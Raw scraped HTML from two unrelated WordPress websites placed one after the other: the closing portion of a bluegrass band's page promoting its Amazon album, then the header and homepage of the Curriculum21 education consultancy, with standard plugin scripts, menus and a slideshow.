target="_blank" class="fl-callout-title-link fl-callout-title-text">Amazon</a></span></h3> <div class="fl-callout-text-wrap"> <div class="fl-callout-text"><p>Wild Mountain on Amazon</p> <p>&nbsp;</p> </div><a href="https://www.amazon.com/gp/product/B0733P9WBT/ref=dm_ws_sp_ps_dp" target="_blank" class="fl-callout-cta-link">Listen...</a> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div><!-- .entry-content --> <footer class="entry-footer"> </footer><!-- .entry-footer --> </article><!-- #post-## --> </main><!-- #main --> </div> <div class="col-md-4"> <aside id="secondary" class="widget-area" role="complementary"> <section id="gigpress-2" class="widget widget_gigpress"><h2 class="widget-title">Upcoming Shows</h2> <p class="gigpress-empty">No shows booked at the moment.</p><!-- Generated by GigPress 2.3.21 --> </section><section id="email-subscribers-2" class="widget widget_text elp-widget"><h2 class="widget-title">Be In The Know</h2> <div class="es_form_container"> <form class="es_widget_form" data-es_form_id="es_widget_form"> <div class="es_caption">Receive monthly newsletters and event updates</div> <div class="es_lablebox"> <label class="es_widget_form_name">Name</label> </div> <div class="es_textbox"> <input type="text" id="es_txt_name" class="es_textbox_class" name="es_txt_name" value="" maxlength="60"> </div> <div class="es_lablebox"> <label class="es_widget_form_email">Email *</label> </div> <div class="es_textbox"> <input type="email" id="es_txt_email" class="es_textbox_class" name="es_txt_email" value="" maxlength="60" required> </div> <div class="es_button"> <input type="submit" id="es_txt_button" class="es_textbox_button es_submit_button" name="es_txt_button" value="Subscribe"> </div> <div class="es_msg" id="es_widget_msg"> <span id="es_msg"></span> </div> <input type="hidden" id="es_txt_group" name="es_txt_group" value="Public"> <input type="hidden" name="es-subscribe" id="es-subscribe" value="6e8c0927e7"/> </form> </div> </section> <section id="recent-posts-2" class="widget widget_recent_entries"> <h2 class="widget-title">Recent Posts</h2> <ul> <li> <a href="https://www.wildmountaingreengrass.com/free-download-of-satisfy-this-girl/">Free Download of Satisfy This Girl</a> </li> <li> <a href="https://www.wildmountaingreengrass.com/the-nightly-met/">The Nightly Met</a> </li> <li> <a href="https://www.wildmountaingreengrass.com/the-beat-goes-on-wild-mountain/">The Beat Goes On &#8211; Wild Mountain</a> </li> </ul> </section></aside><!-- #secondary --> </div> </div><!--row--> </div><!-- #primary --> </div><!-- container --> </div><!-- #content --> <footer id="colophon" class="site-footer" role="contentinfo"> <div class="footer-widget-container"> <div class="container"> <div class="row"> <div class="col-md-4"> <div class="widget footer-widget"><h1 class="widget-title">Wild Mountain Greengrass Now Available!</h1><a href="https://www.amazon.com/gp/product/B0733P9WBT/ref=dm_ws_sp_ps_dp"><img width="300" height="275" src="https://www.wildmountaingreengrass.com/wp-content/uploads/2017/10/frontCover-300x275.png" class="image wp-image-340 attachment-medium size-medium" alt="" style="max-width: 100%; height: auto;" srcset="https://www.wildmountaingreengrass.com/wp-content/uploads/2017/10/frontCover-300x275.png 300w, https://www.wildmountaingreengrass.com/wp-content/uploads/2017/10/frontCover-768x703.png 768w, https://www.wildmountaingreengrass.com/wp-content/uploads/2017/10/frontCover-1024x938.png 1024w, https://www.wildmountaingreengrass.com/wp-content/uploads/2017/10/frontCover-1600x1465.png 1600w" sizes="(max-width: 300px) 100vw, 300px" /></a></div> </div> <div class="col-md-4"> </div> <div class="col-md-4"> <div class="widget footer-widget"><h1 class="widget-title">Contact Us</h1><ul><li class="has-label"><strong>Email</strong><br><div><a href="mailto:&#119;&#105;l&#100;&#109;&#111;un&#116;a&#105;&#110;&#103;r&#101;en&#103;&#114;&#97;&#115;&#115;&#64;g&#109;&#97;i&#108;&#46;&#99;o&#109;">&#119;&#105;l&#100;&#109;&#111;un&#116;a&#105;&#110;&#103;r&#101;en&#103;&#114;&#97;&#115;&#115;&#64;g&#109;&#97;i&#108;&#46;&#99;o&#109;</a></div></li></ul></div> </div> </div> </div> </div> <div class="copy-right"> <div class="container"> <div class="row"> <div class="col-md-6 col-md-push-6"> <ul class="social-media"> <li><a href="https://www.facebook.com/wildmountaingreengrass/" title="Facebook"><i class="fa fa-facebook"></i></a></li> <li><a href="https://twitter.com/wildmountaingr1" title="Twitter"><i class="fa fa-twitter"></i></a></li> <li><a href="https://www.youtube.com/channel/UC1HqltuUQcSQzA2t0j2yG0Q" title="Youtube"><i class="fa fa-youtube"></i></a></li> <li><a href="https://www.instagram.com/wildmountaingreengrass" title="Instagram"><i class="fa fa-instagram"></i></a></li> <li><a href="mailto:[email protected]" title="Email"><i class="fa fa-envelope"></i></a></li> </ul> </div> <div class="col-md-6 col-md-pull-6"> <div class="site-info"> &copy; Wild Mountain, LLC </div><!-- .site-info --> </div> </div> </div> </div> </footer><!-- #colophon --> </div><!-- #page --> <script type="text/javascript"> if(typeof jQuery == 'undefined' || typeof jQuery.fn.on == 'undefined') { document.write('<script src="https://www.wildmountaingreengrass.com/wp-includes/js/jquery/jquery.js"><\/script>'); document.write('<script src="https://www.wildmountaingreengrass.com/wp-includes/js/jquery/jquery-migrate.min.js"><\/script>'); } </script> <style>[class*="fa fa-"]{font-family: FontAwesome !important;}</style><link rel='stylesheet' id='gigpress-css-css' href='https://www.wildmountaingreengrass.com/wp-content/plugins/gigpress/css/gigpress.css?ver=4.9.8' type='text/css' media='all' /> <script type='text/javascript' src='https://www.wildmountaingreengrass.com/wp-content/uploads/bb-plugin/cache/156-layout.js?ver=8603cd3450bb0c4f67c011a7b3d8a8b2'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/www.wildmountaingreengrass.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}}}; /* ]]> */ </script> <script type='text/javascript' src='https://www.wildmountaingreengrass.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.5'></script> <script type='text/javascript'> /* <![CDATA[ */ var ebd_inline = {"ajaxurl":"https:\/\/www.wildmountaingreengrass.com\/wp-admin\/admin-ajax.php","ajax_nonce":"2f562e1af5"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.wildmountaingreengrass.com/wp-content/plugins/email-before-download/public/js/email-before-download-public.js?ver=5.1.9'></script> <script type='text/javascript'> /* <![CDATA[ */ var es_widget_page_notices = {"es_email_notice":"Please enter email address","es_success_message":"Successfully Subscribed.","es_success_notice":"Your subscription was successful! Kindly check your mailbox and confirm your subscription. If you don't see the email within a few minutes, check the spam\/junk folder.","es_email_exists":"Email Address already exists!","es_error":"Oops.. Unexpected error occurred.","es_invalid_email":"Invalid email address","es_try_later":"Please try after some time","es_ajax_url":"https:\/\/www.wildmountaingreengrass.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.wildmountaingreengrass.com/wp-content/plugins/email-subscribers/widget/es-widget-page.js?ver=4.9.8'></script> <script type='text/javascript' src='https://www.wildmountaingreengrass.com/wp-content/themes/rock-n-rolla/js/navigation.js?ver=20151215'></script> <script type='text/javascript' src='https://www.wildmountaingreengrass.com/wp-content/themes/rock-n-rolla/js/skip-link-focus-fix.js?ver=20151215'></script> <script type='text/javascript' src='https://www.wildmountaingreengrass.com/wp-includes/js/wp-embed.min.js?ver=4.9.8'></script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8" /> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="stylesheet" type="text/css" media="all" href="http://www.curriculum21.com/wp-content/themes/curriculum21/style.css" /> <link rel="pingback" href="http://www.curriculum21.com/xmlrpc.php" /> <link rel="icon" href="http://www.curriculum21.com/wp-content/themes/curriculum21/favicon.ico" type="image/x-icon"> <link rel="shortcut icon" href="http://www.curriculum21.com/wp-content/themes/curriculum21/favicon.ico" type="image/x-icon"> <title>Curriculum21</title> <link rel='dns-prefetch' href='//netdna.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Curriculum21 &raquo; Feed" href="http://www.curriculum21.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Curriculum21 &raquo; Comments Feed" href="http://www.curriculum21.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.curriculum21.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=06a6e77dacbc32d41e520f792996873e"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='portfolio_slideshow-css' href='http://www.curriculum21.com/wp-content/plugins/portfolio-slideshow-pro/css/portfolio-slideshow.min.css?ver=1.8.7' type='text/css' media='screen' /> <link rel='stylesheet' id='fancybox-css' href='http://www.curriculum21.com/wp-content/plugins/portfolio-slideshow-pro/js/fancybox/jquery.fancybox-1.3.4.css?ver=1.3.4a' type='text/css' media='screen' /> <link rel='stylesheet' id='ps-photoswipe-style-css' href='http://www.curriculum21.com/wp-content/plugins/portfolio-slideshow-pro/css/photoswipe.min.css?ver=1.8.7' type='text/css' media='screen' /> <link rel='stylesheet' id='jquery.prettyphoto-css' href='http://www.curriculum21.com/wp-content/plugins/wp-video-lightbox/css/prettyPhoto.css?ver=06a6e77dacbc32d41e520f792996873e' type='text/css' media='all' /> <link rel='stylesheet' id='video-lightbox-css' href='http://www.curriculum21.com/wp-content/plugins/wp-video-lightbox/wp-video-lightbox.css?ver=06a6e77dacbc32d41e520f792996873e' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='http://www.curriculum21.com/wp-includes/css/dist/block-library/style.min.css?ver=06a6e77dacbc32d41e520f792996873e' type='text/css' media='all' /> <link rel='stylesheet' id='cff-css' href='http://www.curriculum21.com/wp-content/plugins/custom-facebook-feed-pro/css/cff-style.css?13&#038;ver=06a6e77dacbc32d41e520f792996873e' type='text/css' media='all' /> <link rel='stylesheet' id='cff-font-awesome-css' href='//netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.min.css?ver=4.0.3' type='text/css' media='all' /> <script type='text/javascript' src='http://www.curriculum21.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://www.curriculum21.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='http://www.curriculum21.com/wp-content/plugins/wp-video-lightbox/js/jquery.prettyPhoto.min.js?ver=3.1.6'></script> <script type='text/javascript'> /* <![CDATA[ */ var vlpp_vars = {"prettyPhoto_rel":"wp-video-lightbox","animation_speed":"fast","slideshow":"5000","autoplay_slideshow":"false","opacity":"0.80","show_title":"true","allow_resize":"true","allow_expand":"true","default_width":"640","default_height":"480","counter_separator_label":"\/","theme":"pp_default","horizontal_padding":"20","hideflash":"false","wmode":"opaque","autoplay":"false","modal":"false","deeplinking":"false","overlay_gallery":"true","overlay_gallery_max":"30","keyboard_shortcuts":"true","ie6_fallback":"true"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.curriculum21.com/wp-content/plugins/wp-video-lightbox/js/video-lightbox.js?ver=3.1.6'></script> <link rel='https://api.w.org/' href='http://www.curriculum21.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.curriculum21.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.curriculum21.com/wp-includes/wlwmanifest.xml" /> <link rel="canonical" href="http://www.curriculum21.com/" /> <link rel='shortlink' href='http://www.curriculum21.com/' /> <link rel="alternate" type="application/json+oembed" href="http://www.curriculum21.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.curriculum21.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://www.curriculum21.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.curriculum21.com%2F&#038;format=xml" /> <!-- Custom Facebook Feed JS vars --> <script type="text/javascript"> var cffsiteurl = "http://www.curriculum21.com/wp-content/plugins"; var cfflinkhashtags = "false"; </script> <!-- Portfolio Slideshow--> <noscript><link rel="stylesheet" type="text/css" href="http://www.curriculum21.com/wp-content/plugins/portfolio-slideshow-pro/css/portfolio-slideshow-noscript.css?ver=1.8.7" /></noscript><style type="text/css">.centered .ps-next {} .scrollable {height:75px;} .ps-prev {top:42.5px} .ps-next {top:-47.5px} .slideshow-wrapper .pscarousel img {margin-right:8px !important; margin-bottom:8px !important;}</style><script type="text/javascript">/* <![CDATA[ */var psTimeout = new Array(); psAudio = new Array(); var psAutoplay = new Array(); var psDelay = new Array(); var psFluid = new Array(); var psTrans = new Array(); var psRandom = new Array(); var psCarouselSize = new Array(); var touchWipe = new Array(); var psPagerStyle = new Array(); psCarousel = new Array(); var psSpeed = new Array(); var psLoop = new Array(); var psClickOpens = new Array(); /* ]]> */</script> <!--//Portfolio Slideshow--> <script type="text/javascript"><!-- function powerpress_pinw(pinw_url){window.open(pinw_url, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;} //--> </script> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//www.curriculum21.com/?wordfence_lh=1&hid=7FF1149CDE25AE2B23A947991DF43450'); </script><script> WP_VIDEO_LIGHTBOX_VERSION="1.8.8"; WP_VID_LIGHTBOX_URL="http://www.curriculum21.com/wp-content/plugins/wp-video-lightbox"; function wpvl_paramReplace(name, string, value) { // Find the param with regex // Grab the first character in the returned string (should be ? or &) // Replace our href string with our new value, passing on the name and delimeter var re = new RegExp("[\?&]" + name + "=([^&#]*)"); var matches = re.exec(string); var newString; if (matches === null) { // if there are no params, append the parameter newString = string + '?' + name + '=' + value; } else { var delimeter = matches[0].charAt(0); newString = string.replace(re, delimeter + name + "=" + value); } return newString; } </script><script type="text/javascript">document.documentElement.className += " js";</script> <style type="text/css">.broken_link, a.broken_link { text-decoration: line-through; }</style> <script type="text/javascript" src="http://www.curriculum21.com/wp-content/themes/curriculum21/scripts/collaborate.js"></script> <script type="text/javascript" src="http://www.curriculum21.com/wp-content/themes/curriculum21/scripts/cufon.js"></script> <script type="text/javascript" src="http://www.curriculum21.com/wp-content/themes/curriculum21/scripts/cufon.gillsans.font.js"></script> <script type="text/javascript"> Cufon.replace( 'h1', { fontFamily: 'GillSans', fontSize: '48px' } ); Cufon.replace( 'h2', { fontFamily: 'GillSans', fontSize: '36px' } ); Cufon.replace( 'h3', { fontFamily: 'GillSans', fontSize: '28px' } ); Cufon.replace( 'h4, .sidebar>.page_item>a', { fontFamily: 'GillSans', fontSize: '24px' } ); Cufon.replace( '#menu-main .menu-item a', { fontFamily: 'GillSans', fontSize: '16x' } ); Cufon.replace( '#menu-top .menu-item a, .sidebar li li a, .sidebar .widget li a', { fontFamily: 'GillSans', fontSize: '13px' } ); Cufon.replace( '#reply-title small', { fontFamily: 'GillSans', fontSize: '13px' } ); Cufon.replace( '.breadcrumb', { fontFamily: 'GillSans', fontSize: '13px' } ); </script> </head> <body class="home page-template-default page page-id-4 page-name-home"> <a name="top"></a> <div id="page"> <div id="head"> <h1 class="hidden">Curriculum21 - Mapping the Global Classroom of the Future</h1> <div class="menu-top-container"><ul id="menu-top" class="menu"><li id="menu-item-14" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14"><a href="http://www.curriculum21.com/about/">About Us</a></li> <li id="menu-item-39" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-39"><a href="http://www.curriculum21.com/contact/">Contact Us</a></li> <li id="menu-item-42" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-42"><a title="Account" href="/wp-admin/">My Account</a></li> <li id="menu-item-44" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-44"><a title="Log In" href="/wp-login.php">Log In / Register</a></li> </ul></div> <div id="brand"><a href="http://www.curriculum21.com" style="display:block;height:80px;"></a><div id="title"></div></div> <div id="search"> <div class="search"><form role="search" method="get" id="searchform" class="searchform" action="http://www.curriculum21.com/"> <div> <label class="screen-reader-text" for="s">Search for:</label> <input type="text" value="" name="s" id="s" /> <input type="submit" id="searchsubmit" value="Search" /> </div> </form></div> </div> <div class="menu-under-search-container"><ul id="menu-under-search" class="menu"><li id="menu-item-665" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-665"><a href="http://www.curriculum21.com/e-newsletter-signup/">E-Newsletter SignUp</a></li> </ul></div> </div> <div class="menu-main-container"><ul id="menu-main" class="menu"><li id="menu-item-1318" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-4 current_page_item menu-item-1318"><a href="http://www.curriculum21.com/" aria-current="page">Home</a></li> <li id="menu-item-2336" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-2336"><a href="http://www.curriculum21.com/pd/">pd21 Services</a> <ul class="sub-menu"> <li id="menu-item-2338" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2338"><a href="http://www.curriculum21.com/pd/mapping-to-the-core/">Mapping to the Core</a></li> <li id="menu-item-2337" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2337"><a href="http://www.curriculum21.com/pd/curriculum-mapping/">Curriculum Mapping</a></li> <li id="menu-item-2339" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2339"><a href="http://www.curriculum21.com/pd/curriculum21/">Curriculum 21</a></li> <li id="menu-item-2340" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2340"><a href="http://www.curriculum21.com/pd/active-literacy/">Active Literacy</a></li> <li id="menu-item-2341" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2341"><a href="http://www.curriculum21.com/contact/service-request/">Request PD Services</a></li> </ul> </li> <li id="menu-item-33" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-33"><a href="http://www.curriculum21.com/news/">EduNews</a></li> <li id="menu-item-32" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32"><a href="http://www.curriculum21.com/clearinghouse/">Clearinghouse</a></li> <li id="menu-item-31" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-31"><a href="http://curriculum21.ning.com/">Learning Commons</a></li> <li id="menu-item-1697" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1697"><a href="http://www.curriculum21.com/hub/">Resource Hub</a> <ul class="sub-menu"> <li id="menu-item-1928" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1928"><a href="http://www.curriculum21.com/blog/">Blog</a></li> <li id="menu-item-1929" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1929"><a href="http://www.curriculum21.com/pd/curriculum21/curriculum-21-podcast-channel-in-itunes/">Curriculum 21 Podcast Channel in iTunes</a></li> <li id="menu-item-1954" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1954"><a href="http://www.curriculum21.com/hub/webinar21/">Webinars</a></li> <li id="menu-item-1955" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1955"><a href="http://www.curriculum21.com/hub/">and more&#8230;</a></li> </ul> </li> </ul></div> <div class="clear"> </div> <div id="menu-main-sub"></div> <div id="content"> <div id="content-body"> <div id="content-body-inner"> <div class="post-4 page type-page status-publish hentry"> <h2 style="display:none"><a href="http://www.curriculum21.com/">Home</a></h2> <p>&nbsp;</p> <table width="962"> <tbody> <tr> <td> <table width="663"> <tbody> <tr> <td colspan="3" valign="top" height="275"><script type="text/javascript">/* <![CDATA[ */ psTimeout[260296]=6000;psAudio[260296]=false;psAutoplay[260296]=true;psDelay[260296]=0;psTrans[260296]='fade';psLoop[260296]=true;psCarouselSize[260296]=6;psSpeed[260296]=1200;psPagerStyle[260296]='bullets';psClickOpens[260296]='openurl';/* ]]&gt; */</script><div id="slideshow-wrapper260296" class="slideshow-wrapper clearfix centered toggle-closed"><a id="psprev260296" href="javascript: void(0);"></a><a id="psnext260296" href="javascript: void(0);"></a> <div id="portfolio-slideshow260296" class="portfolio-slideshow showloader"> <div class="slideshow-content"> <a href="https://www.routledge.com/Active-Literacy-Across-the-Curriculum-Connecting-Print-Literacy-with-Digital/Jacobs/p/book/9781138909571" target="_blank" class="_blank"><img class="psp-active" height="180" width="690" data-img="http://www.curriculum21.com/wp-content/uploads/2012/05/2017-home-4.png" src="http://www.curriculum21.com/wp-content/uploads/2012/05/2017-home-4.png" alt="2017-home-4" /><noscript><img src="http://www.curriculum21.com/wp-content/uploads/2012/05/2017-home-4.png" alt="2017-home-4" /></noscript></a></div><!-- .slideshow-content --> <div class="not-first slideshow-content"> <a href="http://boldmovesbootcamp.com/curr-mapping" target="_blank" class="_blank"><img class="psp-active" height="180" width="690" data-img="http://www.curriculum21.com/wp-content/uploads/2012/05/bold-header-2018.png" src="http://www.curriculum21.com/wp-content/uploads/2012/05/bold-header-2018.png" alt="bold-header-2018" /><noscript><img src="http://www.curriculum21.com/wp-content/uploads/2012/05/bold-header-2018.png" alt="bold-header-2018" /></noscript></a></div><!-- .slideshow-content --> <div class="not-first slideshow-content"> <a href="http://www.amplifiEDucation.com" target="_blank" class="_blank"><img class="psp-active" height="180" width="690" data-img="http://www.curriculum21.com/wp-content/uploads/2016/09/homeslide-silvia.png" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///ywAAAAAAQABAAACAUwAOw==" alt="homeslide-silvia" /><noscript><img src="http://www.curriculum21.com/wp-content/uploads/2016/09/homeslide-silvia.png" alt="homeslide-silvia" /></noscript></a></div><!-- .slideshow-content --> <div class="not-first slideshow-content"> <a href="http://www.curriculum21.com/bold-moves-for-schools/" target="_blank" class="_blank"><img class="psp-active" height="180" width="690" data-img="http://www.curriculum21.com/wp-content/uploads/2017/04/bold-book-new.png" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///ywAAAAAAQABAAACAUwAOw==" alt="bold-book-new" /><noscript><img src="http://www.curriculum21.com/wp-content/uploads/2017/04/bold-book-new.png" alt="bold-book-new" /></noscript></a></div><!-- .slideshow-content --> <div class="not-first slideshow-content"> <a href="http://www.curriculum21.com/pd/" target="_blank" class="_blank"><img class="psp-active" height="180" width="690" data-img="http://www.curriculum21.com/wp-content/uploads/2013/08/pd21slide-home4.png" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///ywAAAAAAQABAAACAUwAOw==" alt="pd21slide-home4" /><noscript><img src="http://www.curriculum21.com/wp-content/uploads/2013/08/pd21slide-home4.png" alt="pd21slide-home4" /></noscript></a></div><!-- .slideshow-content --> <div class="not-first slideshow-content"> <a href="http://www.ascd.org/publications/books/109008.aspx" target="_blank" class="_blank"><img class="psp-active" height="180" width="690" data-img="http://www.curriculum21.com/wp-content/uploads/2013/08/c21book-home2.png" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///ywAAAAAAQABAAACAUwAOw==" alt="c21book-home2" /><noscript><img src="http://www.curriculum21.com/wp-content/uploads/2013/08/c21book-home2.png" alt="c21book-home2" /></noscript></a></div><!-- .slideshow-content --> </div><!--#portfolio-slideshow--><div id="slideshow-meta260296" class="slideshow-meta centered"><div class="meta-content"></div><!-- .meta-content --><div class="meta-content not-first "></div><!-- .meta-content --><div class="meta-content not-first "></div><!-- .meta-content --><div class="meta-content not-first "></div><!-- .meta-content --><div class="meta-content not-first "></div><!-- .meta-content --><div class="meta-content not-first "></div><!-- .meta-content --></div></div><!--#slideshow-wrapper--></td> </tr> <tr> <td align="left" valign="top" width="221"><a title="Blog" href="http://www.curriculum21.com/blog/"><img class="alignnone size-full wp-image-512" title="blog21" src="http://beta.curriculum21.com/wp-content/uploads/2011/08/blog21.jpg" alt="" width="221" height="105" /></a><!-- Recent Posts Embed - Version 1.4.2.1 - Sebastien Berthiau --> <ul> <li>27 April 2017 : <a href="http://www.curriculum21.com/2017/04/media-making-stereoscopes-with-google-cardboard/">Media Making: Stereoscopes with Google Cardboard</a> </li> <li>22 March 2017 : <a href="http://www.curriculum21.com/2017/03/pushing-boundaries-renewing-our-mission/">Pushing Boundaries: Renewing our Mission</a> </li> <li>15 May 2016 : <a href="http://www.curriculum21.com/2016/05/we-need-engaged-educators/">We need Engaged Educators</a> </li> <li>6 May 2016 : <a href="http://www.curriculum21.com/2016/05/3-things-i-wish-educators-knew-about-their-own-learning/">3 Things I Wish Educators Knew About their Own Learning</a> </li> <li>30 November 2015 : <a href="http://www.curriculum21.com/2015/11/10-tips-to-get-started-with-sketchnoting/">10 Tips to Get Started with Sketchnoting</a> </li> </ul></td> <td colspan="2" align="left"><code><a title="Global Partnership Resource Hub" href="http://www.c21hub.com/globalpartnership/" target="_blank"><img class="aligncenter wp-image-3374 size-full" src="http://www.curriculum21.com/wp-content/uploads/2010/12/Global-hub.png" alt="Global-hub" width="400" height="350" srcset="http://www.curriculum21.com/wp-content/uploads/2010/12/Global-hub.png 400w, http://www.curriculum21.com/wp-content/uploads/2010/12/Global-hub-300x262.png 300w" sizes="(max-width: 400px) 100vw, 400px" /></a><br /> </code></td> </tr> </tbody> </table> </td> <td valign="top" width="240"> <p><div id="attachment_3817" style="width: 235px" class="wp-caption aligncenter"><a href="http://www.curriculum21.com/wp-content/uploads/2016/07/HHJ_purp_Crop.jpg"><img aria-describedby="caption-attachment-3817" class="wp-image-3817" src="http://www.curriculum21.com/wp-content/uploads/2016/07/HHJ_purp_Crop-204x300.jpg" alt="Heidi Hayes Jacobs " width="225" height="331" srcset="http://www.curriculum21.com/wp-content/uploads/2016/07/HHJ_purp_Crop-204x300.jpg 204w, http://www.curriculum21.com/wp-content/uploads/2016/07/HHJ_purp_Crop-768x1130.jpg 768w, http://www.curriculum21.com/wp-content/uploads/2016/07/HHJ_purp_Crop-696x1024.jpg 696w, http://www.curriculum21.com/wp-content/uploads/2016/07/HHJ_purp_Crop.jpg 1087w" sizes="(max-width: 225px) 100vw, 225px" /></a><p id="caption-attachment-3817" class="wp-caption-text">Heidi Hayes Jacobs, founder and president of Curriculum Designers, Inc.</p></div></td> </tr> </tbody> </table> <div class="pagination"></div> <div class="clear"> </div> </div> <div class="clear"> </div> <div class="clear"> </div> </div> </div> <div style="clear:both"></div> </div> <div id="foot"> <hr noshade size="1"> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tbody> <tr> <td align="center" valign="middle" width="16%"> <a href="http://twitter.com/curriculum21" target="_blank" style="vertical-align:middle"><img src="http://www.curriculum21.com/wp-content/themes/curriculum21/images/twitter.png" border="0" alt="Twitter" style="vertical-align:middle"></a> </td> <td align="center" valign="middle" width="16%"> <a href="http://www.facebook.com/pages/curriculum21/119718868043870" target="_blank" style="vertical-align:middle"><img src="http://www.curriculum21.com/wp-content/themes/curriculum21/images/facebook.png" border="0" alt="Facebook" style="vertical-align:middle"></a> </td> <td align="center" valign="middle" width="16%"> <a href="http://www.youtube.com/curriculum21" target="_blank" style="vertical-align:middle"><img 